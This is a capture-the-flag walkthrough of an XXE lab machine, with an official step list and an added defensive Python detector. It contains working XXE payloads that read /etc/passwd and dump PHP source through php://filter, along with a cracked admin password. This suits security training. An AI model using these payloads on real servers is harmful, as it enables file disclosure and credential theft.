XXE target VM

Start the virtual machine environment (leave it running untouched)

Open Kali

Since both machines use NAT adapters and sit on the same subnet, run an nmap scan; it turns up the new IP address, so browse to it

When you see a website, scan its directories first

In Kali, scan with dirsearch -u; robots.txt has something in it, so take a look

Open robots.txt (the "gentlemen's agreement"); it lists xxe and admin.php, so change the URL accordingly

Logically admin.php should exist as well, but it cannot be accessed, which is odd; all we can do is keep going

Successfully got in; open Burp, get ready to intercept the request, and send it to

Before modifying the XML, it is best to first submit a perfectly normal XML rather than going straight for the password, so the server does not immediately detect attack traffic

Getting ready; the XML shown here has already been modified. The username and password are sent as XML, so XXE injection is worth considering

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///etc/passwd">
]>
<root><name>&sp;</name><password>hj</password></root>

Modify the code at the XML part,

Modify the XML again; we still have one clue to use, the earlier admin.php, so we construct the XML like this:

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&sp;</name><password>hj</password></root>
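A defender's view of the two request shapes above, as an added Python example that is not code from the post or from the lab: a rule that flags the DOCTYPE and external-entity indicators a WAF or log review would look for in a posted XML login body (including the php://filter source-read trick), and a hardened parse that rejects any body carrying a DTD. The sample bodies are constructed here to mirror the payloads in the post.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample request bodies: the first two mirror the XXE payloads
# used against the lab, the third is the benign login submission.
XXE_FILE = '''<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///etc/passwd">
]>
<root><name>&sp;</name><password>hj</password></root>'''

XXE_FILTER = '''<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&sp;</name><password>hj</password></root>'''

BENIGN = '<?xml version="1.0" ?><root><name>hj</name><password>hj</password></root>'

# Matches <!ENTITY name SYSTEM "uri"> and <!ENTITY name PUBLIC "id" "uri">,
# including parameter entities (<!ENTITY % name ...>).
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s*)?(\w+)\s+(SYSTEM|PUBLIC)\s+(?:"[^"]*"\s+)?"([^"]*)"', re.I)


def inspect_xml_body(body):
    """Return (indicator, detail) pairs a detection rule would raise for a login body."""
    findings = []
    if re.search(r'<!DOCTYPE', body, re.I):
        findings.append(('doctype', ''))  # a login form never needs a DTD
    for _param, name, _kind, uri in ENTITY_RE.findall(body):
        scheme = uri.split(':', 1)[0].lower() if ':' in uri else 'relative'
        findings.append(('external_entity', f'{name}:{scheme}'))
        if scheme == 'php' and 'convert.base64-encode' in uri:
            findings.append(('php_filter_source_read', uri))  # reads PHP source as base64
    if findings and re.search(r'&\w+;', body):
        findings.append(('entity_reference_in_content', ''))  # entity echoed via a field
    return findings


def parse_login(body):
    """Hardened parse: refuse any body with DTD indicators before the parser sees it.
    Returns (name, password) for a clean body, or None when the body is rejected."""
    if inspect_xml_body(body):
        return None
    root = ET.fromstring(body)
    return root.findtext('name'), root.findtext('password')
```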

You can see a lot of garbled text; those who have studied cryptography may have an idea. Here I simply use Burp's built-in base64 decoder

Decode

Decoded successfully, but the password still has to be recovered from its MD5 hash; use https://www.cmd5.com/ to look it up

Recovered successfully; now we know:

Username: administhebest

Password: admin@123

And there are no more clues now, so let's try this password,

Try logging in

Logged in successfully (this password was cracked from admin.php, so naturally it only works for logging in at admin.php, which makes sense)

Open flag

A new path appears: flagmeout.php

So change admin.php in the earlier payload to flagmeout.php and try it

OK, those who have studied cryptography should >>>

OK, it is still base64 decoding, but the decoded result is garbled; here you really do need to have studied cryptography, otherwise you would not know how to decode this

It is base32 (the SimplyCalc base32 decoder)

It decodes to /etc/.flag.php

Good, now modify the XML again

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&sp;</name><password>hj</password></root>

Then decode it... huh, why is it garbled? Actually you did nothing wrong; I feel this is the challenge author's fault (just kidding). Next comes something you would never guess: create a new PHP file and paste the garbled text straight into it

Then open it in the browser

The flag is visible; XML really is something. Failure evaluating code: SAFCSP{xxe_is_so_easy}

I will not post the VM itself, 1.3G is a bit large; it should be findable online.

The official English walkthrough is below:

1: access the VM IP on port 80.
--------------------------------------------------
2: by checking (robots.txt) we can see there is a (xxe) folder and admin.php; be sure the admin.php is not in the web root and try it in the xxe folder.
--------------------------------------------------
3: IP/xxe will show a login page that is vulnerable to XML External Entity (XXE).
--------------------------------------------------
4: submit the form and intercept it; it will show an XML post.
--------------------------------------------------
5: edit XML tags to test XXE
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///etc/passwd">
]>
<root><name>&sp;</name><password>hj</password></root>
(it will show /etc/passwd)
--------------------------------------------------
6: change file:///etc/passwd to read admin.php content
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&sp;</name><password>hj</password></root>
--------------------------------------------------
7: we now have the content encoded in base64; after decoding it we get this line
if ($_POST['username'] == 'administhebest' &&
   md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
username and password; decrypting the pass using Google will show (admin@123).
--------------------------------------------------
8: administhebest:admin@123, we log in as admin; it will let you access admin.php and show us the flag with a hyperlink to flagmeout.php -> in the same folder, but the code sends us to the web root; let's test /xxe/flagmeout.php, it will open, and by viewing the source we can see a comment that says ( <!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) --> )
--------------------------------------------------
9: decode JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5 using Base32 (http://www.simplycalc.com/base32-decode.php); we get a Base64 string, and decoding it gives ( /etc/.flag.php )
--------------------------------------------------
10: access the file (/etc/.flag.php)
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&sp;</name><password>hj</password></root>

or simply without php://filter (<!ENTITY sp SYSTEM "/etc/.flag.php">) we get the code.
--------------------------------------------------
11: decoding the Base64 will show phpnonalpha2 code; save it on your computer, e.g. flag.php (make sure to add <?php and ?> to the code because it is PHP).
--------------------------------------------------
12: open a terminal and type (php flag.php); it will show an error in the code, but the last line will show a flag that says (SAFCSP{xxe_is_so_easy}).
